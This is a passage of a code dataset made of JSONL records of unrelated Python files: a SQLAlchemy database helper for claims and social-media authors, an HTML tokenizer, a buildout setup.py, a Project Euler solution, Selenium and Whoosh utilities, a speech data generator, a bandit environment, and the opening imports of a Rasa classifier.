= user.profile_background_image_url\n author.profile_background_tile = user.profile_background_tile\n author.profile_banner_url = user.profile_banner_url\n author.profile_link_color = user.profile_link_color\n\n author.profile_sidebar_fill_color = user.profile_sidebar_fill_color\n author.profile_text_color = user.profile_text_color\n author.location = user.location if user.location != None else None\n author.protected = user.protected if user.protected != None else None\n author.time_zone = user.time_zone if user.time_zone != None else None\n author.url = user.url if user.url != None else None\n author.utc_offset = user.utc_offset if user.utc_offset != None else None\n author.domain = domain\n author.verified = user.verified\n\n return author\n\n def add_claim_connections(self, claim_connections):\n i = 1\n for claim in claim_connections:\n if (i % 100 == 0):\n msg = \"\\r Insert claim_connection to DB: [{}\".format(i) + \"/\" + str(len(claim_connections)) + ']'\n print(msg, end=\"\")\n i += 1\n self.session.merge(claim)\n msg = \"\\r Insert claim_connection to DB: [{}\".format(i) + \"/\" + str(len(claim_connections)) + ']'\n print(msg)\n self.commit()\n\n def get_claim_tweet_connections(self):\n q = \"\"\"\n SELECT *\n FROM claim_tweet_connection \n \"\"\"\n query = text(q)\n result = self.session.execute(query)\n return list(result)\n\n def get_claim_ordered_by_num_of_posts(self):\n q = \"\"\"\n SELECT claim_tweet_connection.claim_id, COUNT(claim_tweet_connection.post_id)\n FROM claim_tweet_connection \n GROUP BY 1\n ORDER BY 2 DESC \n \"\"\"\n query = text(q)\n result = self.session.execute(query)\n return list(result)\n\n def get_table_by_name(self, table_name):\n for var in globals():\n class_obj = globals()[var]\n try:\n if issubclass(class_obj, Base) and class_obj.__tablename__ == table_name:\n return class_obj\n except:\n pass\n return None\n\n def get_verified_authors(self):\n results = self.session.query(Author).filter(Author.verified == '1').all()\n return results\n\n def get_post_osn_ids(self):\n q = \"\"\"\n SELECT post_osn_id\n FROM posts\n \"\"\"\n query = text(q)\n result = self.session.execute(query)\n return list(result)\n\n def get_posts_by_selected_domain(self, domain):\n q = \"\"\"\n SELECT posts.post_id, posts.post_type\n FROM posts\n WHERE posts.domain = :domain\n \"\"\"\n query = text(q)\n result = self.session.execute(query, params=dict(domain=domain))\n return list(result)\n\n def get_claim_id_posts_dict(self):\n claim_id_posts_dict = defaultdict(list)\n post_dict = self.get_post_dictionary()\n for claim_id, post_id in self.get_claim_tweet_connections():\n claim_id_posts_dict[claim_id].append(post_dict[post_id])\n return claim_id_posts_dict\n\n def get_claim_posts(self, limit = 1):\n # table_elements = self.session.query(connection_source_attr, destination_table) \\\n # .join(source_table, connection_source_attr == source_id_attr) \\\n # .join(destination_table, connection_target_attr == destination_id_attr) \\\n # .filter(and_(condition for condition in conditions)) \\\n # .order_by(connection_source_attr) \\\n # .yield_per(10000).enable_eagerloads(False).offset(offset)\n\n\n claim_posts = self.session.query(Claim_Tweet_Connection.claim_id, Post)\\\n .join(Claim_Tweet_Connection, Post.post_id == Claim_Tweet_Connection.post_id)\\\n .order_by(Claim_Tweet_Connection.claim_id).yield_per(10000).enable_eagerloads(False)\n claim_id_posts = defaultdict(list)\n for i, (claim_id, post) in enumerate(claim_posts):\n if claim_id not in claim_id_posts and len(claim_id_posts) == limit:\n yield claim_id_posts\n claim_id_posts = defaultdict(list)\n\n claim_id_posts[claim_id].append(post)\n # print()\n yield claim_id_posts\n\n def get_author_friends_by_sources(self, author_guids):\n author_connections = self.session.query(AuthorConnection.source_author_guid, AuthorConnection.destination_author_guid) \\\n .filter(and_(or_(AuthorConnection.source_author_guid.in_(author_guids), AuthorConnection.destination_author_guid.in_(author_guids)), AuthorConnection.connection_type == 'friend')).yield_per(10000).enable_eagerloads(False)\n\n author_friends = defaultdict(set)\n for i, (source_author, dest_author) in enumerate(author_connections):\n author_friends[source_author].add(dest_author)\n author_friends[dest_author].add(source_author)\n return author_friends\n\n def get_claim_post_author_connections_with_verdict(self):\n q = \"\"\"\n SELECT claim_tweet_connection.claim_id, claim_tweet_connection.post_id, posts.author_guid, claims.verdict\n FROM claim_tweet_connection\n INNER JOIN posts ON (posts.post_id = claim_tweet_connection.post_id)\n INNER JOIN claims ON (claims.claim_id = claim_tweet_connection.claim_id)\n \"\"\"\n query = text(q)\n result = self.session.execute(query)\n return list(result)\n\n def get_claim_post_author_connections(self):\n q = \"\"\"\n SELECT claim_tweet_connection.claim_id, claim_tweet_connection.post_id, posts.author_guid\n FROM claim_tweet_connection\n INNER JOIN posts ON (posts.post_id = claim_tweet_connection.post_id)\n \"\"\"\n query = text(q)\n result = self.session.execute(query)\n return list(result)\n\n def delete_author_sub_type(self):\n query = '''\n UPDATE authors\n SET author.author_sub_type = NULL\n '''\n self.update_query(query)\n\n def add_claim_keywords_connection(self, claim_id, type, keywords):\n claim_keywords_connections = Claim_Keywords_Connections()\n claim_keywords_connections.claim_id = claim_id\n claim_keywords_connections.keywords = keywords\n claim_keywords_connections.type = type\n self.addPost(claim_keywords_connections)\n\n def add_claim_keywords_connections(self, connections):\n self.addPosts(connections)\n\n def get_claim_keywords_connections(self):\n return self.session.query(Claim_Keywords_Connections).all()\n\n def get_claim_keywords_connections_by_type(self, type):\n return self.session.query(Claim_Keywords_Connections).filter(Claim_Keywords_Connections.type == type).all()\n\n def get_claim_id_keywords_dict_by_connection_type(self, type):\n connections = self.get_claim_keywords_connections_by_type(type)\n return {connection.claim_id: connection.keywords for connection in connections}\n\n def add_claim_tweet_connections_fast(self, claim_post_connections):\n table_name = 'claim_tweet_connections'\n self.add_entity_fast(table_name, claim_post_connections)\n\n def add_posts_fast(self, posts):\n table_name = 'posts'\n keys = ['post_id', 'domain']\n self.add_entity_fast(table_name, posts)\n\n def add_terms_fast(self, terms):\n table_name = 'terms'\n keys = ['term_id']\n self.add_entity_fast(table_name, terms)\n\n def add_claim_keywords_connections(self, claim_keywords):\n self.add_entity_fast('claim_keywords', claim_keywords)\n\n def add_topic_items_fast(self, topic_items):\n table_name = 'topics'\n keys = ['topic_id', 'term_id']\n self.add_entity_fast(table_name, topic_items)\n\n def add_post_topic_mappings_fast(self, post_topic_mappings):\n table_name = 'post_topic_mapping'\n keys = ['post_id']\n self.add_entity_fast(table_name, post_topic_mappings)\n\n def add_news_articles_fast(self, news_articles):\n table_name = 'news_articles'\n keys = ['article_id']\n self.add_entity_fast(table_name, news_articles)\n\n def add_author_connections_fast(self, author_connections):\n keys = ['source_author_guid', 'destination_author_guid', 'connection_type']\n table_name = 'author_connections'\n self.add_entity_fast(table_name, author_connections)\n\n def add_author_features_fast(self, author_features):\n keys = ['author_guid', 'window_start', 'window_end', 'attribute_name']\n table_name = 'author_features'\n self.insert_or_update(author_features)\n\n def add_reddit_authors(self, authors):\n keys = ['name', 'author_guid']\n table_name = 'reddit_authors'\n self.add_entity_fast(table_name, authors)\n\n def add_claims_fast(self, claims):\n keys = ['claim_id']\n table_name = 'claims'\n self.add_entity_fast(table_name, claims)\n\n def add_authors_fast(self, authors):\n keys = ['author_guid', 'name', 'domain']\n table_name = 'authors'\n self.add_entity_fast(table_name, authors)\n\n def get_entity_key(self, table_item):\n return self.inspect_item(table_item).identity\n\n def inspect_item(self, table_item):\n return inspect(table_item)\n\n def map_item(self, item, table_mapper):\n return mapper(item, table_mapper)\n\n def add_entity_fast(self, table_name, entities):\n try:\n self.session.bulk_save_objects(entities)\n self.session.commit()\n print('Add {} new {} to db'.format(len(entities), table_name))\n return\n except Exception as e:\n count = len(entities)\n self.session.rollback()\n if count <= 10000:\n self.merge_items(entities)\n self.session.commit()\n else:\n self.add_entity_fast(table_name, entities[:(count/2)])\n self.add_entity_fast(table_name, entities[(count/2):])\n\n # def add_authors_fast(self, authors):\n # self.add_items_fast(self.get_author_dictionary(), authors, 'author_guid', 'authors')\n\n # def add_author_features_fast(self, author_features):\n # author_feature_dict = {author_feature.author_guid: author_feature for author_feature in self.get_author_features()}\n # self.add_items_fast(author_feature_dict, author_features, 'author_guid', 'author_features')\n\n def add_items_fast(self, item_dict, items, item_key, item_type='items'):\n self.session.close()\n filtered_items = []\n for item in items:\n if getattr(item, item_key) not in item_dict:\n filtered_items.append(item)\n item_dict[getattr(item, item_key)] = item\n duplication_count = str(len(items) - len(filtered_items))\n print('Add {} new {} to db, remove {} duplications'.format(len(filtered_items), item_type, duplication_count))\n self.session.bulk_save_objects(filtered_items)\n self.session.commit()\n\n def get_claims_tuples(self):\n q = \"\"\"\n SELECT *\n FROM claims\n \"\"\"\n query = text(q)\n result = self.session.execute(query)\n return list(result)\n\n def get_posts_from_domain_contain_words(self, domain, words):\n conditions = [Post.content.like('%{}%'.format(word)) for word in words]\n return self.session.query(Post).filter(and_(Post.domain == domain, and_(*conditions))).all()\n\n def insert_or_update(self, items):\n try:\n self.session.bulk_save_objects(items, update_changed_only=False)\n self.session.commit()\n except Exception as e:\n self.session.rollback()\n self.addPosts(items)\n\n def delete_class_author_features(self, class_name):\n self.session.query(AuthorFeatures).filter(AuthorFeatures.attribute_name.startswith(class_name)).delete(\n synchronize_session=False)\n self.session.commit()\n\n def drop_table(self, table_name):\n if self.is_table_exist(table_name):\n table = self.get_table_by_name(table_name)\n table.__table__.drop(self.engine)\n\n def get_authors_with_feature(self, feature_prefix_name, author_guids=None):\n if not author_guids:\n result = self.session.query(AuthorFeatures.author_guid).distinct(AuthorFeatures.author_guid) \\\n .filter(AuthorFeatures.attribute_name.startswith(feature_prefix_name)).all()\n else:\n result = self.session.query(AuthorFeatures.author_guid).distinct(AuthorFeatures.author_guid) \\\n .filter(and_(AuthorFeatures.attribute_name.startswith(feature_prefix_name),\n AuthorFeatures.author_guid.in_(set(author_guids)))).all()\n return [r[0] for r in result]\n\n def get_authors_with_enough_features(self, feature_prefix_name, count):\n result = self.session.query(AuthorFeatures.author_guid, func.count(AuthorFeatures.attribute_name)) \\\n .filter(AuthorFeatures.attribute_name.startswith(feature_prefix_name)) \\\n .group_by(AuthorFeatures.author_guid).having(func.count(AuthorFeatures.attribute_name) == count).all()\n return [r[0] for r in result]\n\n def get_authors_with_features(self, feature_names, author_guids=None):\n # author_sets = [set(self.get_authors_with_feature(feature_name, author_guids)) for feature_name in feature_names]\n result = self.session.query(AuthorFeatures.author_guid).distinct(AuthorFeatures.author_guid) \\\n .filter(and_(AuthorFeatures.attribute_name.startswith(feature_name) for feature_name in feature_names))\n return set.intersection(*author_sets)\n\n def get_hospital_twitter_screen_names(self):\n q = \"\"\"\n SELECT hospital_tweet_users_with_screen_names.screen_name\n FROM hospital_tweet_users_with_screen_names\n \"\"\"\n query = text(q)\n result = self.session.execute(query)\n cursor = result.cursor\n screen_names = self.result_iter(cursor)\n return [r[0] for r in screen_names]\n # return screen_names\n #return list(result)\n\n def get_labor_employees_screen_names(self):\n q = \"\"\"\n SELECT labor_unions_tweet_users_with_screen_names.screen_name\n FROM labor_unions_tweet_users_with_screen_names\n \"\"\"\n query = text(q)\n result = self.session.execute(query)\n cursor = result.cursor\n screen_names = self.result_iter(cursor)\n return [r[0] for r in screen_names]\n\n def get_follower_ids_of_hospitals_and_labor_unions(self):\n q = \"\"\"\n SELECT union_healthcare_and_labor_union_workers.destination_author_osn_id\n FROM union_healthcare_and_labor_union_workers\n \"\"\"\n query = text(q)\n result = self.session.execute(query)\n cursor = result.cursor\n ids = self.result_iter(cursor)\n return [id[0] for id in ids]\n\n\n def get_intersection_of_labor_union_and_healthcare_users_followers_ids(self):\n q = \"\"\"\n SELECT DISTINCT(temp_author_connections.destination_author_osn_id)\n FROM temp_author_connections\n WHERE temp_author_connections.destination_author_osn_id IN (\n SELECT healtchcare_temp_author_connections.destination_author_osn_id\n FROM healtchcare_temp_author_connections\n )\n \"\"\"\n query = text(q)\n result = self.session.execute(query)\n cursor = result.cursor\n ids = self.result_iter(cursor)\n return [id[0] for id in ids]\n\n\n #\n # collect all users who we finished to collect their followers_ids\n def get_already_retrieved_their_follower_ids(self):\n q = \"\"\"\n SELECT DISTINCT(temp_author_connections.source_author_osn_id)\n FROM temp_author_connections\n WHERE temp_author_connections.connection_type = 'follower'\n \"\"\"\n query = text(q)\n result = self.session.execute(query)\n cursor = result.cursor\n screen_names = self.result_iter(cursor)\n return [r[0] for r in screen_names]\n\n\n # SELECT DISTINCT(temp_author_connections.destination_author_osn_id)\n # FROM temp_author_connections\n # WHERE temp_author_connections.source_author_osn_id NOT IN (\n # SELECT labor_unions_users_with_screen_names_osn_ids_and_relevance.author_osn_id\n # FROM labor_unions_users_with_screen_names_osn_ids_and_relevance\n # WHERE labor_unions_users_with_screen_names_osn_ids_and_relevance.is_related_to_healthcare_using_Wikipedia = '0'\n # )\n # AND temp_author_connections.destination_author_osn_id NOT IN (\n # SELECT labor_unions_users_with_screen_names_osn_ids_and_relevance.author_osn_id\n # FROM labor_unions_users_with_screen_names_osn_ids_and_relevance\n # )\n\n def get_healthcare_labor_union_follower_ids(self):\n q = \"\"\"\n SELECT DISTINCT(temp_author_connections.destination_author_osn_id)\n FROM temp_author_connections\n WHERE temp_author_connections.destination_author_osn_id NOT IN (\n SELECT labor_unions_users_with_screen_names_osn_ids_and_relevance.author_osn_id\n FROM labor_unions_users_with_screen_names_osn_ids_and_relevance\n )\n \"\"\"\n query = text(q)\n result = self.session.execute(query)\n cursor = result.cursor\n osn_ids = self.result_iter(cursor)\n return [r[0] for r in osn_ids]\n\n\n def get_poi_screen_names(self):\n q = \"\"\"\n SELECT Optional_POIs_with_twitter_screen_name.twitter_author_screen_name\n FROM Optional_POIs_with_twitter_screen_name\n \"\"\"\n query = text(q)\n result = self.session.execute(query)\n cursor = result.cursor\n screen_names = self.result_iter(cursor)\n return [r[0] for r in screen_names]\n\n def get_poi_v6_screen_names(self):\n q = \"\"\"\n SELECT Health_POIs_V6_with_screen_names.author_screen_name\n FROM Health_POIs_V6_with_screen_names\n \"\"\"\n query = text(q)\n result = self.session.execute(query)\n cursor = result.cursor\n screen_names = self.result_iter(cursor)\n return [r[0] for r in screen_names]\n\n def get_follower_ids_to_crawl(self):\n q = \"\"\"\n SELECT DISTINCT(temp_author_connections.destination_author_osn_id)\n FROM temp_author_connections\n WHERE temp_author_connections.destination_author_osn_id NOT IN (\n SELECT authors.author_osn_id\n FROM authors\n )\n \"\"\"\n query = text(q)\n result = self.session.execute(query)\n cursor = result.cursor\n author_ids = self.result_iter(cursor)\n return [r[0] for r in author_ids]\n\n def get_author_ids_not_general_public_and_not_brought_followers_for_them(self):\n q = \"\"\"\n SELECT Health_POIs_V6_with_screen_names_and_osn_ids.author_osn_id\n FROM Health_POIs_V6_with_screen_names_and_osn_ids\n WHERE Health_POIs_V6_with_screen_names_and_osn_ids.general_public_interest = ''\n AND Health_POIs_V6_with_screen_names_and_osn_ids.author_osn_id NOT IN (\n SELECT DISTINCT(temp_author_connections.source_author_osn_id)\n FROM temp_author_connections\n )\n \"\"\"\n query = text(q)\n result = self.session.execute(query)\n cursor = result.cursor\n author_ids = self.result_iter(cursor)\n return [r[0] for r in author_ids]\n\n def get_description_and_full_names_for_authors(self):\n q = \"\"\"\n SELECT authors.author_guid, authors.author_osn_id, authors.author_screen_name, authors.author_full_name, authors.description\n FROM authors\n \"\"\"\n query = text(q)\n result = self.session.execute(query)\n cursor = result.cursor\n records = self.result_iter(cursor)\n return records\n\n\n def get_healthcare_worker_screen_names(self):\n q = \"\"\"\n SELECT authors.author_screen_name\n FROM authors\n WHERE authors.author_type = 'Healthcare_Worker_Auto'\n \"\"\"\n query = text(q)\n result = self.session.execute(query)\n cursor = result.cursor\n screen_names = self.result_iter(cursor)\n return [r[0] for r in screen_names]\n\n def get_spokesmanships_screen_names(self):\n q = \"\"\"\n SELECT spokesmanships.Twitter_Screen_Name\n FROM spokesmanships\n WHERE spokesmanships.Twitter_Screen_Name IS NOT NULL\n \"\"\"\n query = text(q)\n result = self.session.execute(query)\n cursor = result.cursor\n author_screen_names = self.result_iter(cursor)\n return [r[0] for r in author_screen_names]\n\n return set.intersection(*author_sets)\n\n def get_authors_by_popularity(self):\n query = \"\"\"\n SELECT posts.author_guid, count(posts.post_id)\n FROM posts\n GROUP BY 1\n ORDER BY 2 Desc\n \"\"\"\n # posts = self.session.query(Post).filter(Post.domain == unicode(domain)).slice(start,stop).all()\n query = text(query)\n result = self.session.execute(query)\n cursor = result.cursor\n author_popularity_tupls = self.result_iter(cursor) # , a\n return author_popularity_tupls","sub_path":"DB/schema_definition.py","file_name":"schema_definition.py","file_ext":"py","file_size_in_byte":217021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"15324797","text":"#!/usr/bin/env python\nimport os\nimport BaseHTMLTokenizer as bht\nfrom BaseHTMLTokenizer import BaseHTMLTokenizer\n\n\nPYTHON_TEXT_EXTRACT_SCRIPT = os.path.join(os.path.dirname(bht.__file__),\"extractText.py\")\nPERL_TOKENIZE_SCRIPT = os.path.join(os.path.dirname(bht.__file__),\"tokenize.pl\")\n\n\n\t\nclass HTMLTokenizer(BaseHTMLTokenizer):\n\tdef __init__(self,db_path,**kwargs):\n\t\t'''\n\t\tUse of subprocess for multi-threaded processing needs to be fixed\n\t\t'''\n\t\tdef textExtractor(html_string):\t\t\t\n\t\t\timport subprocess\n\t\t\tp = subprocess.Popen([\"python\",PYTHON_TEXT_EXTRACT_SCRIPT],stdout=subprocess.PIPE,stdin=subprocess.PIPE)\n\t\t\tout,err = p.communicate(html_string)\n\t\t\tif err:\n\t\t\t\traise Exception(err)\n\t\t\treturn out\n\t\t\t#import extracttext as et\t\t\t\t\t\t\n\t\t\t#return et.extractText(html_string).encode(\"utf-8\")\n\t\t\t\t\n\t\tdef tokenExtractor(page_text):\n\t\t\timport subprocess\n\t\t\tp = subprocess.Popen([\"perl\",PERL_TOKENIZE_SCRIPT],stdout=subprocess.PIPE,stdin=subprocess.PIPE)\n\t\t\tout,err = p.communicate(page_text)\n\t\t\tif err:\n\t\t\t\traise Exception(err)\n\t\t\treturn out\n\t\t\n\t\tsuper(self.__class__,self).__init__(db_path,textExtractor,tokenExtractor,**kwargs)\n\t\t\t\nif __name__ == \"__main__\":\t\n\tpass","sub_path":"tokenize/HTMLTokenizer.py","file_name":"HTMLTokenizer.py","file_ext":"py","file_size_in_byte":1165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"519342107","text":"from setuptools import setup, find_packages\n\nname = \"gocept.cvs\"\nsetup(\n name = name,\n version = \"0.1.10\",\n author = \"Daniel Havlik\",\n author_email = \"dh@gocept.com\",\n description = \"zc.buildout recipe for checking out cvs modules.\",\n long_description = open('README.txt').read() + \n '\\n\\n' + \n open('CHANGES.txt').read(),\n license = \"ZPL 2.1\",\n keywords = \"buildout cvs recipe\",\n classifiers = [\"Framework :: Buildout\"],\n url='http://svn.gocept.com/repos/gocept/'+name,\n download_url='https://svn.gocept.com/repos/gocept/gocept.cvs/trunk#egg=gocept.cvs-dev',\n zip_safe=False,\n packages = find_packages('src'),\n include_package_data = True,\n package_dir = {'':'src'},\n namespace_packages = ['gocept'],\n install_requires = ['zc.buildout', 'setuptools'],\n entry_points = {\n 'zc.buildout': [\n 'default = %s:Recipe' % name],\n 'zc.buildout.uninstall': [\n 'default = %s:uninstall' % name],\n },\n test_suite = 'gocept.cvs.tests.test_recipe.test_suite',\n tests_require = ['zc.buildout',\n 'zope.testing',\n 'setuptools',\n 'py == 0.9.0',],\n )\n","sub_path":"pypi_install_script/gocept.cvs-0.1.10.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1212,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"262727629","text":"# jacob clarkson\n# project euler problem 2\n# january 2015\n\n# variables to store previously calculated fibonacci numbers\nx = 1\ny = 2\nz = 0\n\n# variable to store the sum\nsum = 0\n\n# main loop\nwhile 1:\n\tz = x + y # calculate next term\n\tif z >= 4000000: # break out of while loop\n\t\tbreak\n\tif z % 2 == 0: # check for even and add to sum\n\t\tsum += z\n\tx = y # swap stored values\n\ty = z\n\nprint(sum + 2)\n","sub_path":"Prob02.py","file_name":"Prob02.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"436338381","text":"from abc import ABCMeta\n\nfrom selenium.common.exceptions import NoSuchElementException, TimeoutException\nfrom selenium.webdriver.remote.webdriver import WebDriver\nfrom selenium.webdriver.support.wait import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\n\nWAIT_TIMEOUT = 20\n\n\nclass PageObject(metaclass=ABCMeta):\n\n def __init__(self, driver):\n self.driver: WebDriver = driver\n\n def is_element_located_present(self, how, what):\n try:\n return bool(self.driver.find_element(how, what))\n except NoSuchElementException:\n return False\n\n def is_element_located_displayed(self, how, what):\n try:\n return self.driver.find_element(how, what).is_displayed()\n except NoSuchElementException:\n return False\n\n def wait_for_presence_of_element_located(self, how, what, timeout=0):\n timeout = timeout or WAIT_TIMEOUT\n wait = WebDriverWait(self.driver, timeout)\n try:\n wait.until(EC.presence_of_element_located((how, what)))\n except TimeoutException:\n return False\n\n def wait_for_visibility_of_element_located(self, how, what, timeout=0):\n timeout = timeout or WAIT_TIMEOUT\n wait = WebDriverWait(self.driver, timeout)\n try:\n wait.until(EC.visibility_of_element_located((how, what)))\n except TimeoutException:\n return False\n\n def wait_for_ajax(self, timeout=0):\n timeout = timeout or WAIT_TIMEOUT\n wait = WebDriverWait(self.driver, timeout)\n try:\n wait.until(lambda dr: dr.execute_script(\"return jQuery.active == 0\"))\n except TimeoutException:\n return False\n\n def wait_for_javascript(self, timeout=0):\n timeout = timeout or WAIT_TIMEOUT\n wait = WebDriverWait(self.driver, timeout)\n try:\n wait.until(lambda dr: dr.execute_script('return document.readyState === \"complete\"'))\n except TimeoutException:\n return False\n","sub_path":"page_objects/abstract/page_object.py","file_name":"page_object.py","file_ext":"py","file_size_in_byte":2026,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"187456556","text":"from whoosh.index import create_in\nfrom whoosh.fields import *\n\nschema = Schema(title=TEXT(stored=True),path=ID(stored=True),content=TEXT(stored=True))\nix = create_in('indexer',schema)\nwriter = ix.writer()\nwriter.add_document(title=u'xio小',path=u'/a',content = u'this is the first')\nwriter.add_document(title=u'xio小',path=u'/b',content = u'this is the first xio小 we\"ve add!')\nwriter.commit(merge=False)\n\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"273303458","text":"import numpy as np\n\nfrom audio_process import get_input_and_length\nfrom text_process import get_label_and_length\n\n\n# train数据生成器\ndef train_generator(data, batchs, batch_size, audio_feature_type, max_input_length, max_label_length):\n audio_data_path_list, text_int_sequences_list = data\n\n # generator只能进行一次生成,故需要while True来进行多个epoch的数据生成\n while True:\n # 每epoch将所有数据进行一次shuffle\n order = np.random.choice(len(audio_data_path_list), len(audio_data_path_list), replace=False)\n audio_data_path_list = [audio_data_path_list[i] for i in order]\n text_int_sequences_list = [text_int_sequences_list[i] for i in order]\n\n for idx in range(batchs):\n batch_input_tensor, batch_input_length = get_input_and_length(\n audio_data_path_list[idx * batch_size: (idx + 1) * batch_size],\n audio_feature_type,\n max_input_length\n )\n batch_label_tensor, batch_label_length = get_label_and_length(\n text_int_sequences_list[idx * batch_size: (idx + 1) * batch_size],\n max_label_length\n )\n\n yield batch_input_tensor, batch_label_tensor, batch_input_length, batch_label_length\n\n\n# 测试数据生成器\ndef test_generator(data, batchs, batch_size, audio_feature_type, max_input_length):\n audio_data_path_list, text_list = data\n\n while True:\n for idx in range(batchs):\n batch_input_tensor, batch_input_length = get_input_and_length(\n audio_data_path_list[idx * batch_size: (idx + 1) * batch_size],\n audio_feature_type,\n max_input_length\n )\n batch_text_list = text_list[idx * batch_size: (idx + 1) * batch_size]\n\n # 测试集只需要文本串list\n yield batch_input_tensor, batch_input_length, batch_text_list\n\n\nif __name__ == '__main__':\n pass\n","sub_path":"hlp/stt/utils/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":1976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"235803617","text":"from selenium import webdriver\nfrom selenium.webdriver.support.ui import Select\nimport time\nimport math\n\n\n# find_element_by_css_selector('input[type=\"checkbox\"]')\ndef calc(x):\n return str(math.log(abs(12 * math.sin(int(x)))))\n\n\nlink = \"http://suninjuly.github.io/get_attribute.html\"\n\nwith webdriver.Chrome() as browser:\n try:\n browser.get(link)\n chest = browser.find_element_by_id(\"treasure\")\n valuex = chest.get_attribute(\"valuex\")\n print(valuex)\n x = calc(valuex)\n print(x)\n text_field = browser.find_element_by_id(\"answer\")\n text_field.send_keys(x)\n checkbox = browser.find_element_by_id(\"robotCheckbox\")\n checkbox.click()\n radiobutton = browser.find_element_by_id(\"robotsRule\")\n radiobutton.click()\n submit_button = browser.find_element_by_css_selector(\"body > div > form > div > div > button\")\n submit_button.click()\n\n finally:\n time.sleep(5)\n browser.quit()\n","sub_path":"Module_2/Lesson 2.1.5.py","file_name":"Lesson 2.1.5.py","file_ext":"py","file_size_in_byte":985,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"354401495","text":"from porise import Env \nfrom porise.envs.utils import seeding\nfrom porise.envs.utils.discrete import Discrete\n\nimport numpy as np \nimport itertools\n\n\nclass LinearEnv(Env):\n def __init__(self, n_arm, feature_dim, max_steps=1e5, noise_std=1.0):\n self.action_space = Discrete(n_arm)\n self.n_arm = n_arm\n self.feature_dim = feature_dim\n self.max_steps = max_steps\n self.h = self.get_reward_func()\n # standard deviation of Gaussian reward noise\n self.noise_std = noise_std\n\n self.seed()\n # initialize arm features, rewards, and others.\n self.reset()\n \n def get_reward_func(self):\n a = np.random.randn(self.feature_dim)\n a /= np.linalg.norm(a, ord=2)\n return lambda x: 100*np.dot(a, x)\n\n def seed(self, seed=None):\n self.np_random, seed = seeding.np_random(seed)\n return [seed]\n \n def step(self, action):\n err_msg = \"%r (%s) invalid\" % (action, type(action))\n assert self.action_space.contains(action), err_msg\n\n reward = self.rewards[self.steps_beyond_done, action]\n best_action = self.best_actions_oracle[self.steps_beyond_done]\n regret = self.best_rewards_oracle[self.steps_beyond_done] - reward\n assert self.action_space.contains(best_action)\n assert regret >= 0\n self.info = {\n 'best_arm_hit': best_action == action,\n 'regret': regret\n }\n \n if self.steps_beyond_done == self.max_steps-1:\n self.done = True \n self.steps_beyond_done = 0\n else:\n self.steps_beyond_done += 1\n self.state = self.features[self.steps_beyond_done]\n\n return self.state, reward, self.done, self.info\n\n def reset(self):\n self.state = None\n self.steps_beyond_done = 0\n self.done = False \n self.info = {}\n self.best_arm_hit = 0\n\n self.reset_features()\n self.reset_rewards(self.h)\n \n def reset_features(self):\n \"\"\"Generate normalized random N(0,1) features.\n \"\"\"\n x = np.random.randn(self.max_steps, self.n_arm, self.feature_dim)\n x /= np.repeat(np.linalg.norm(x, axis=-1, ord=2), self.feature_dim).reshape(self.max_steps, self.n_arm, self.feature_dim)\n self.features = x\n\n def reset_rewards(self, h):\n \"\"\"Generate rewards for each arm and each round,\n following the reward function h + Gaussian noise.\n \"\"\"\n self.rewards = np.array(\n [\n h(self.features[t, k]) + self.noise_std*np.random.randn()\\\n for t,k in itertools.product(range(self.max_steps), range(self.n_arm))\n ]\n ).reshape(self.max_steps, self.n_arm)\n\n # to be used only to compute regret, NOT by the algorithm itself\n self.best_rewards_oracle = np.max(self.rewards, axis=1)\n self.best_actions_oracle = np.argmax(self.rewards, axis=1)","sub_path":"porise/envs/synthetic/contextual_base.py","file_name":"contextual_base.py","file_ext":"py","file_size_in_byte":2951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"343229465","text":"import copy\nimport logging\nfrom collections import defaultdict\nfrom pathlib import Path\n\nimport numpy as np\nimport os\nimport scipy.sparse\nimport tensorflow as tf\n\nfrom typing import Any, Dict, List, Optional, Text, Tuple, Union, Type\n\nimport rasa.shared.utils.io\nimport rasa.utils.io as io_utils\nimport rasa.nlu.utils.bilou_utils as bilou_utils\nfrom rasa.shared.constants import DIAGNOSTIC_DATA\nfrom rasa.nlu.featurizers.featurizer import Featurizer\nfrom rasa.nlu.components import Component\nfrom rasa.nlu.classifiers.classifier import IntentClassifier\nfrom rasa.nlu.extractors.extractor import EntityExtractor, EntityTagSpec\nfrom rasa.nlu.classifiers import LABEL_RANKING_LENGTH\nfrom rasa.utils import train_utils\nfrom rasa.utils.tensorflow import layers\nfrom rasa.utils.tensorflow.models import RasaModel, TransformerRasaModel\nfrom rasa.utils.tensorflow.model_data import (\n RasaModelData,\n FeatureSignature,\n FeatureArray,\n)\nfrom rasa.nlu.constants import TOKENS_NAMES\nfrom rasa.shared.nlu.constants import (\n TEXT,\n INTENT,\n INTENT_RESPONSE_KEY,\n ENTITIES,\n ENTITY_ATTRIBUTE_TYPE,\n ENTITY_ATTRIBUTE_GROUP,\n ENTITY_ATTRIBUTE_ROLE,\n NO_ENTITY_TAG,\n SPLIT_ENTITIES_BY_COMMA,\n)\nfrom rasa.nlu.config import RasaNLUModelConfig\nfrom rasa.shared.exceptions import InvalidConfigException\nfrom rasa.shared.nlu.training_data.training_data import TrainingData\nfrom rasa.shared.nlu.training_data.message import Message\nfrom rasa.nlu.model import Metadata\nfrom rasa.utils.tensorflow.constants import (\n LABEL,\n IDS,\n HIDDEN_LAYERS_SIZES,\n SHARE_HIDDEN_LAYERS,\n TRANSFORMER_SIZE,\n NUM_TRANSFORMER_LAYERS,\n NUM_HEADS,\n BATCH_SIZES,\n BATCH_STRATEGY,\n EPOCHS,\n RANDOM_SEED,\n LEARNING_RATE,\n 